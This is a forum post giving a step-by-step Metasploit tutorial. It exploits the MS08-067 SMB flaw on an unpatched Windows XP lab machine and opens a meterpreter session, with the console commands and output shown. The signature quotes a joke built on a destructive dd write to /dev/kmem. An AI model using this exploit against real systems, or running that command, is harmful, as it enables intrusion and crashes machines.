Results 1 to 10 of 12

Thread: introduction to metasploit

Threaded View

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Location
    /home
    Posts
    43

    Default introduction to metasploit

    This tutorial will give a basic introduction to metasploit.
    In the process, we'll also exploit a machine and run meterpreter on it.

    Everything that needs to be typed in console makes use of the code tag
    example:
    Code:
    msfconsole
    Also, I assume you have some basic understanding of networking and linux.
    WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.

    now on to the actual guide.

    requirements:
    backtrack 4 final
    non-patched windows xp sp2 box
    (confirmed that this does not work on xp sp3)
    some patience

    These are my ip's, make sure to change it to reflect your own settings
    attacker: 192.168.198.129
    victim: 192.168.198.130

    Ok, first things first, make sure that metasploit is updated.
    Code:
    /pentest/exploits/fasttrack/fast-track.py -i
    1 
    2

    Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)

    Code:
    nmap -v 192.168.198.130
    Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)
    These are port 135, 139, 445.
    We're going to focus on port 445.
    A quick search on google shows us that port 445 is commonly used for smb.

    start up metasploit
    Code:
    msfconsole
    when its done loading,
    Code:
    show exploits windows
    We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.
    Code:
    use windows/smb/ms08_067_netapi
    Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>

    Great, so now we have an exploit, but what next?
    an exploit is useless without a payload, so
    Code:
    show payloads
    This will give us a list of payloads compatible with the exploit.
    We're going to use a meterpreter payload for this tutorial
    Code:
    set payload windows/meterpreter/bind_tcp
    now to configure it all
    Code:
    info
    set target 3
    set rhost 192.168.198.130
    target is the which windows version and service pack our victim is (our case xp sp2)
    though, you could also leave it how it is.
    rhost is the ip of the victim
    everything else can be default.
    if the payload was a reverse tcp, we would also need to set lhost
    lhost is the attackers ip.
    Code:
    exploit
    this is what we (should) get:
    [*] Started bind handler
    [*] Triggering the vulnerability...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444

    meterpreter >
    great! we're in!
    lets see what commands we got at our disposal
    Code:
    help
    under what username is meterpreter running?
    Code:
    getuid
    what processes are running?
    Code:
    ps
    and so we can go on and on about what we can do with meterpreter, but that is outside of the scope of this tutorial.

    hope this guide has been useful to someone, somewhere.

    for a more indepth guide to what metasploit can do, check this link.
    Metasploit Unleashed - Mastering the Framework
    Last edited by EcKo; 01-23-2010 at 04:30 AM. Reason: cleaning up.
    Aquillar> hey, you guys ever play kmem russian roulette?
    Agnostos> I don't believe I have. care to explain the details?
    Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
    Aquillar> keep executing until system crashes
    Aquillar> person that crashes system has to buy beer
    Agnostos> lol
    Agnostos> I wonder if I can sneak that into a server startup script here.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •